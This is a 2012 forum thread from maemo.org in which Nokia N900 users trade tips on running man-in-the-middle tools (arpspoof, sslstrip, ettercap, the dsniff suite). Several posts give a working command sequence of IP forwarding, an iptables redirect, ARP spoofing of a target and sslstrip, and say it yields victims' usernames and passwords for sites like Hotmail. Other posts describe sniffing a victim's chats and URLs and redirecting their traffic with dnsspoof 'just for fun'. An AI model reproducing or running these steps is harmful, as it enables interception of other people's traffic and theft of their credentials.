maemo.org - Talk

maemo.org - Talk (https://talk.maemo.org/index.php)
-   Applications (https://talk.maemo.org/forumdisplay.php?f=41)
-   -   [Tutorial] Pentesting Wireless Networks (https://talk.maemo.org/showthread.php?t=73572)

stevomanu 2012-01-26 17:24

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip

sorry for the wait ... add link to first page if you like ..


Quote:

Originally Posted by karam (Post 1156134)
omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !


-Tyler- 2012-01-26 19:57

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
TO KARAM:

i have talked with other people who has the N900 and MITM attacks no longer wornking in the N900, when you run ettercap or any other program who needs promiscuous mode, the conection get stuck and you can't sniff any packet or navigate with the N900. I have trying to reflash and nothing work, I use:

kernel power 49 with CSSU testing

but i have trying with kernel power 46, 47, 48 and nothing there is some packet or dependency or something thas has screw up the whole promiscuous mode in the N900.

Do you have the same problem??

- Good news!! Recently the projetc ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus, it is a shame we don have this newer version compile for the N900, i have tried the new version in my desktop pc and runs great.

- I have a question for you, are you developing for the N9 ?? because we still doesn't have in the N9 nothing of pentesting material, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit nothing. I will be great have someone of your expertice and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine.

Karam thanks for the great work you are for sure one of the biggest experts in the community.

karam 2012-01-26 21:05

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
it's actually true that ettercap makes the connection horrible when using it on N900

that's why i have just finished uploading arpspoof (as package name dsniff)
which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip)

soon this problem will be solved for N900 as arpspoof will be the dependency of yamas

and for N9
unfortunately i don't have one

so till i get one (maybe will never)
then i will port hacking tools to it

PS: ettercap re alive is awesome
will contact the author of the ettercap package to port it to N900 (it's very easy to do)

karam 2012-01-29 17:14

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:

sudo gainroot
Code:

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

Mohammed Muid 2012-01-29 17:36

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??

and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man

karam 2012-01-29 19:13

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

q6600 2012-01-29 22:38

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333

No luck...
I can not open no pages ( chrome, firefox) no internet ...

ps
try as well 8080 still no luck

Mohammed Muid 2012-01-30 01:18

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Quote:

Originally Posted by karam (Post 1157497)
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too ;)

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat

ok. that would be just great. so i hav to wait for like 4 months to get a tutorial for dsniff? anyone around who can help me a bit to do all that karam has mentioned? thanks. and best of luck karam

Seker_94 2012-01-30 12:10

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
it worked with me
is arpspoof -i wlan0 -t router targer ? or only target router?
q6600 maybe your computer is using a proxy

-Tyler- 2012-02-01 14:08

Re: [Tutorial] Hacking Networks with N900 //UPDATE CHARON is released, testers needed
 
Quote:

Originally Posted by karam (Post 1157448)
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:

sudo gainroot
Code:

apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber

then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username

i have tested it with arpspoof and it works perfect!! but it work perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection get stuck the majority of times.

How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience :D

I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community.


All times are GMT. The time now is 20:06.

vBulletin® Version 3.8.8